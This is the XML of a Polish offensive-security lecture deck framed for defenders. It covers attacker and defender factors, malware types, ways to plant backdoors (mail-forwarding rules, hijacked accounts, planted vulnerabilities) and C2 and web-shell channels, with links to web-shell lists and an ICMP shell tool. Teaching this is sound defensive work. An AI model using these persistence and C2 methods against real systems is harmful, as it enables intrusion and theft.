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61" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="478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479" r:id="rId15"/>
    <p:sldId id="362" r:id="rId16"/>
    <p:sldId id="456" r:id="rId17"/>
    <p:sldId id="457" r:id="rId18"/>
    <p:sldId id="401" r:id="rId19"/>
    <p:sldId id="402" r:id="rId20"/>
    <p:sldId id="455" r:id="rId21"/>
    <p:sldId id="459" r:id="rId22"/>
    <p:sldId id="463" r:id="rId23"/>
    <p:sldId id="458" r:id="rId24"/>
    <p:sldId id="464" r:id="rId25"/>
    <p:sldId id="466" r:id="rId26"/>
    <p:sldId id="465" r:id="rId27"/>
    <p:sldId id="469" r:id="rId28"/>
    <p:sldId id="470" r:id="rId29"/>
    <p:sldId id="471" r:id="rId30"/>
    <p:sldId id="473" r:id="rId31"/>
    <p:sldId id="475" r:id="rId32"/>
    <p:sldId id="476" r:id="rId33"/>
    <p:sldId id="272" r:id="rId34"/>
    <p:sldId id="436" r:id="rId35"/>
    <p:sldId id="271" r:id="rId36"/>
    <p:sldId id="468" r:id="rId37"/>
    <p:sldId id="437" r:id="rId38"/>
    <p:sldId id="467" r:id="rId39"/>
    <p:sldId id="438" r:id="rId40"/>
    <p:sldId id="482" r:id="rId41"/>
    <p:sldId id="440" r:id="rId42"/>
    <p:sldId id="441" r:id="rId43"/>
    <p:sldId id="442" r:id="rId44"/>
    <p:sldId id="443" r:id="rId45"/>
    <p:sldId id="480" r:id="rId46"/>
    <p:sldId id="481" r:id="rId47"/>
    <p:sldId id="439" r:id="rId48"/>
    <p:sldId id="444" r:id="rId49"/>
    <p:sldId id="445" r:id="rId50"/>
    <p:sldId id="446" r:id="rId51"/>
    <p:sldId id="447" r:id="rId52"/>
    <p:sldId id="483" r:id="rId53"/>
    <p:sldId id="43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91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9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2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9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2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525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10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31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165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0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51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6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07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7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1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49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89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86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716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123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8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515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580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63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792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56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1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4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2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78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2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SecLists/tree/master/Web-Shell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kN6WGvad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wilded/icmpsh-s-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XkN6WGvad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tack.mitre.org/resources/enterprise-introduc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pr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pr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matrices/enterpri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techniques/T1091/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1189/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566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tack.mitre.org/techniques/T1200/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1133/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1199/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195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k5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explaine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o.edu.p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matrices/enterprise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#III – Bezpieczeństwo ofensywne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Atakujący - czynniki sprzyjające i utrudniające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5201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Czynniki działające na korzyść atakującego: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wykonuje pierwszy krok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wymyśla i znajduje nowe wektory ataków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przeważnie do sukcesu wystarczy, by udał się jeden atak (także im dłużej atakuje, tym większa szansa, że prędzej czy później coś mu się uda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="260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znajomość defensywy jest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1"/>
              <a:t>pomocna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Czynnniki działające na niekorzyść atakującego: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nie zna środowiska, które atakuje (zdobycie tej wiedzy wymaga czasu, pracy i niesie ze sobą ryzyko wykrycia, szczególnie we wczesnej fazie - bo nie zna środowiska </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="26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nie kontroluje atakowanego środowiska (zdobycie kontroli wymaga czasu, pracy, pokonania wielu trudności i niesie ze sobą ryzyko wykrycia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="260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9938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Broniący - czynniki sprzyjające i utrudniające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4031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Czynniki działające na korzyść broniącego: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zna środowisko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kontroluje środowisko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przeważnie ma po swojej stronie wymiar sprawiedliwości i akceptację społeczną </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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Czynnniki działające na niekorzyść broniącego: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nie wie, kiedy nastąpi atak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nie zna wektoru ataku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b="1"/>
              <a:t>skuteczny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>broniący</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1"/>
              <a:t> MUSI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>mieć znajomość sztuki ofensywy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1550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Ofensywa kontra defensywa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608672"/>
            <a:ext cx="11446625" cy="440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Przy pracy ofensywnej, bardzo przydaje się znajomość defensywy (ale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1"/>
              <a:t>nie zawsze jest konieczna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="260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Przy pracy defensywnej, znajomość ofensywy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1"/>
              <a:t>jest konieczna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u="sng"/>
              <a:t>Łatwiej jest odnieść sukces jako atakujący słabo znając sztukę defensywną, niż jako broniący słabo znający sztukę ofensywną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/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>Cele nie są symetryczne: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Głównym celem ofensywy jest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" u="sng"/>
              <a:t>osiągnąć dany cel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>(np. system/bazę)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Głównym celem defensywy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" u="sng"/>
              <a:t>jest ochronić cel i powstrzymać ofensywę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u="sng"/>
              <a:t>Drugorzędnym celem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>ofensywy jest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" u="sng"/>
              <a:t>pokonać/uniknąć defensywy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36942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Świadomość swoich czynników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168725"/>
            <a:ext cx="11446625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Zarówno w pracy w bezpieczeństwie ofensywnym jak i defensywnym, bardzo ważne jest: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być świadomym swoich sprzyjających i utrudniających czynników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wykorzystywać sprzyjające i niwelować utrudniające</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1138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Świadomość swoich czynników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F8751B9-A435-44D5-8A85-24DB19898EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550450" y="1137566"/>
            <a:ext cx="1144662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Najlepszym przykładem jest defensywa jak najlepiej wykorzystująca swoją </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" u="sng"/>
              <a:t>znajomość i kontrolę własnej infrastruktury</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="260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utrzymywanie całej infrastruktury w ładzie, jednolitym standardzie, organizacji, spójnych politykach, ciągłego monitoringu stanu jej zabezpieczeń i funkcjonalności, bezpiecznej konfiguracji i aktualnych wersjach oprogramowania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prawidłowego stosowania wszelkich adewatnych rozwiązań zabezpieczających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/>
              <a:t>rozmieszczenie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1"/>
              <a:t>honeypotów</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312194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500" dirty="0"/>
              <a:t>To, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>czy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dane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>oprogramowanie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>klasyfikujemy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jako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złośliwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0"/>
              <a:t>, jest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>bezpośrednio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uzależnione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0"/>
              <a:t> od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>tego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>czy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>jego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aktywność</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0"/>
              <a:t> jest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>zgodna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0"/>
              <a:t> z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>intencjami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docelowego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użytkownika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>lub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>właściciela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docelowego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>systemu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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4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282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/>
              <a:t>Przykładem mogą być dwie aplikacje z technicznego punktu  widzenia robiące to samo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2541"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541"/>
              <a:t>Przykład #1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- użytkownik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>świadomie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> za pomocą aplikacji mobilnej Facebooka wykonuje i wysyła </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>znajomemu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> zdjęcie nowo zakupionego samochodu </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="254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9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Złośliwe oprogramowanie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842042"/>
            <a:ext cx="10638692" cy="36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/>
              <a:t>Przykładem mogą być dwie aplikacje z technicznego punktu  widzenia robiące to samo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2541"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541"/>
              <a:t>Przykład #2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- złośliwa aplikacja mobilna (malware) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bez wiedzy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> użytkownika regularnie wykonuje i wysyła </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wszystkie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> zdjęcia na serwer kontrolowany przez przestępcę (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>z zamiarem zrobienia/wynalezienia zdjęć o charakterze osobistym/intymnym, mogących posłużyć do szantażu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2541" u="sng">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="254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6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Złośliwe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oprogramowanie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- ang. Malware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4" y="1657558"/>
            <a:ext cx="106386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Virus/Worm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Spyware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Adware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 err="1"/>
              <a:t>Cryptominer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>Coinminer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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Banking Trojan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Ransomware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RAT (Remote Administration Tool)/Trojan horse (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>wyrafinowana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odmiana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" dirty="0"/>
              <a:t> to rootkit)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383556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Tylna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furtka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" - ang. backdoor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3" y="1450731"/>
            <a:ext cx="10893669" cy="47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41"/>
              <a:t>Funkcję backdoora może pełnić na przykład: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zainstalowany w systemie malware (RAT/koń trojański, rootkit)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drobna modyfikacja systemu, w wyniku której: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bieżące hasła prawowitych użytkowników są przechwytywane i 	udostępniane atakującemu (praktyczna funkcjonalność keyloggera)/emaile będą forwardowane (malicious rule)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 kontrola dostępu działa niezgodnie z przeznaczeniem, dając poszerzony 	dostęp mimo braku odpowiednich  poświadczeń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konto użytkownika (zmienione hasło do rzadko używanego/porzuconego/nieaktywnego konta, stworzenie nowego konta)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umieszczona w systemie podatność, w szczególności podatność prowadząca do typu Remote/Local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41915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0779" y="351433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ofensywne?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498284" y="1301328"/>
            <a:ext cx="11446625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 i="1"/>
              <a:t>Wykrywanie i reagowanie na incydenty bezpieczeństwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400"/>
              <a:t> jest tematem ściśle osadzonym w bezpieczeństwie DEFENSYWNYM (obrona)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="3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/>
              <a:t>Niemniej nie da się mówić o bezpieczeństwie defensywnym bez rozumienia bezpieczeństwa ofensywnego</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="3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400" u="sng"/>
              <a:t>Musimy wiedzieć, przed czym w ogóle próbujemy się bronić</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93164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Shell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3" y="1450731"/>
            <a:ext cx="10893669" cy="36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Ang. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541" i="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541"/>
              <a:t> to po prostu program przyjmujący od użytkownika komendy, wykonujący je i zwracający wyniki (wszystko w formie tekstowej)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Znany również jako wiersz poleceń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W systemach uniksopodobnych jest to zazwyczaj </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541" i="1"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541"/>
              <a:t> (inne znane to np. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541" i="1"/>
              <a:t>dash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541" i="1"/>
              <a:t>ksh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541" i="1"/>
              <a:t>zsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="254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W systemach windowsowych jest to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541" i="1"/>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541"/>
              <a:t> (funkcję tę również może pełnić powershell.exe)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Elementarne pojęcie w nomenklaturze administracji IT oraz bezpieczeństwa ofensywnego</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108068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Shell jako podstawowe narzędzie kontroli zdobytego systemu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F41047-D311-465C-9926-8D07C4A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769908"/>
            <a:ext cx="10893669" cy="40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Proces kontroli w nomenklaturze DFIR określa się jako </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541" i="1"/>
              <a:t>Command &amp; Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541"/>
              <a:t> (w skrócie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541" i="1"/>
              <a:t>CC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541"/>
              <a:t> lub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2541" i="1"/>
              <a:t>C2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="254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Podstawowa funkcjonalność każdego Malware z kategorii RAT (inne funkcjonalności to np. wysyłanie i pobieranie plików, robienie zrzutów ekranu, używanie kamery/mikrofonu, logowanie wciśniętych klawiszy itd.)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541"/>
              <a:t>Najczęściej używany zarówno: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tymczasowo, we wczesnej fazie ataku zakończonego udanym Code Execution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541"/>
              <a:t>długoterminowo (RAT jest najczęściej instalowanym rodzajem backdoora)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57195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(C2) - rodzaje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992037" y="2413337"/>
            <a:ext cx="11283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Web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Bind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200">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr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73861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454324" y="1652176"/>
            <a:ext cx="1128335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mała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aplikacja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webowa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> (taka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sama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funkcjonalność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jak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poprzedni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przykład</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> ping z Command Injection), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>umieszczona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na</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>najczęściej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istniejącym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już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wcześniej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systemie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>serwerze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> www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serwer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>uruchamia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ją</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>każdym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razem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gdy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> jest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>wywoływana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przez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klienta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>komenda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> jest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>umieszczana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żądaniu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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rezultat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wykonania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komendy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wraca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odpowiedzi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> HTTP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>tak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jak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>przypadku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przykładu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aplikacji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webowej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podatnej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proste</a:t>
